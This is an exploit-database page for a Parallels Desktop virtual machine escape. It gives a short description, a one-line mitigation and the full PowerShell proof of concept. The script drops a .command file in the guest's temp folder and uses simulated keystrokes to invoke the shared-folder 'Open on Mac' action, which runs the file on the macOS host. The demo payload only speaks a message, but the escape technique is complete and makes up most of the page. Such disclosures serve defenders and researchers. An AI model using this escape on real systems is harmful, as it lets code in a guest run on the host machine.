header-logo
Suggest Exploit
vendor:
Parallels Desktop
by:
Mohammad Reza Espargham
8,8
CVSS
HIGH
Escape from Virtual Machine
20
CWE
Product Name: Parallels Desktop
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: YES
Related CWE: None
CPE: parallels:desktop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2020

Parallels Desktop – Virtual Machine Escape

There is a security issue in the shared folder implementation in Parallels Desktop. The exploit uses a DLL called PrlToolsShellExt.dll and prl_tg Driver. It uses a very simple exploit with powershell to write an OSX Executable file in temp, open the temp in explorer, select the Temp active window, find the r3z4.command file, right click, goto 'Open on Mac' in the menu and click Enter.

Mitigation:

Update to the latest version of Parallels Desktop.
Source

Exploit-DB raw data:

#[+] Title:  Parallels Desktop - Virtual Machine Escape
#[+] Product: Parallels
#[+] Vendor: http://www.parallels.com/products/desktop/
#[+] Affected Versions: All Version
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/reza.espargham
# Github : github.com/rezasp
# youtube : https://youtu.be/_nZ4y0ZTrwA
#
#

#There is a security issue in the shared folder implementation in Parallels Desktop
#DLL : PrlToolsShellExt.dll  10.2.0 (28956)
#prl_tg Driver


#Very simple exploit with powershell
#powershell.exe poc.ps1

#Write OSX Executable file in temp
[io.file]::WriteAllText($env:temp + '\r3z4.command',"Say 'You are hacked by 1337'")


add-type -AssemblyName microsoft.VisualBasic

add-type -AssemblyName System.Windows.Forms

#open temp in explorer
explorer $env:temp

#wait for 500 miliseconds
start-sleep -Milliseconds 500

#select Temp active window
[Microsoft.VisualBasic.Interaction]::AppActivate("Temp")

#find r3z4.command file
[System.Windows.Forms.SendKeys]::SendWait("r3z4")

#right click
[System.Windows.Forms.SendKeys]::SendWait("+({F10})")

#goto "Open on Mac" in menu
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")

#Click Enter
[System.Windows.Forms.SendKeys]::SendWait("~")

#Enjoy ;)s

Navigation

Suggest Exploit

Services By CQR